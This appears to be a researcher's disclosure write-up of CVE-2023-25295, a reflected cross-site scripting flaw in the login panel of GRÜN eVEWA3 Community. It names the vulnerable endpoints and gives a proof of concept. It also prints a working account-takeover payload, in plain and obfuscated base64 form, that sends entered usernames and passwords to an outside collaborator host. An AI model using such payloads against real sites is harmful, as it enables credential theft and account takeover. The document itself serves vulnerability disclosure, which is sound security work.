CVE-2023-25295 ATO via rXSS in eVEWA3 Community

TL;DR

The GRÜN eVEWA Community versions 31 to 53 were susceptible to a reflected Cross-Site Scripting (rXSS) vulnerability in the login form. This vulnerability enables attackers to acquire escalated privileges by submitting a crafted request to the login panel. To address this issue, a security patch labeled “H1” has been applied across versions 31 to 53.

Initial Findings

During my investigation of a domain, I stumbled upon a GRÜN eVEWA site. During my examination of the endpoints, I identified vulnerable rXSS file parameters in the following locations:

evewa3ajax.php?file=
evewa3/evewa3ajax.php?file=

Login Panel

Upon revisiting the login panel, I found a potential case of URL-based injection. This allowed the injection of JavaScript code via the URL, resulting in the reflection of the injected code within the HTML form section:

/evewa3ajax.php%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E

Account Takeover (ATO)

Exploiting the vulnerability, I executed an account takeover by utilizing the JavaScript event onsubmit. This allowed me to surreptitiously transfer the entered credentials to a malicious site whenever the login button was clicked. The impact of this maneuver is a severe compromise of user authentication data, potentially leading to unauthorized access and misuse of user accounts.

To encapsulate my Out-of-Band (OOB) payload, I utilized the atob function, resulting in the following code snippet:

new Image().src="https://jrelf1m8qnwtv2zteql6r62jiao1cv0k.oastify.com/bogus.php?output=U:"+document.forms[0].elements[1].value+"!P:"+document.forms[0].elements[2].value

Additionally, the payload is subjected to Base64 and URL encoding, culminating in the final, obfuscated version:

/%22%20onsubmit%3d%22eval(atob('bmV3IEltYWdlKCkuc3JjPSJodHRwczovL2pyZWxmMW04cW53dHYyenRlcWw2cjYyamlhbzFjdjBrLm9hc3RpZnkuY29tL2JvZ3VzLnBocD9vdXRwdXQ9VToiK2RvY3VtZW50LmZvcm1zWzBdLmVsZW1lbnRzWzFdLnZhbHVlKyIhUDoiK2RvY3VtZW50LmZvcm1zWzBdLmVsZW1lbnRzWzJdLnZhbHVl'));

Timeline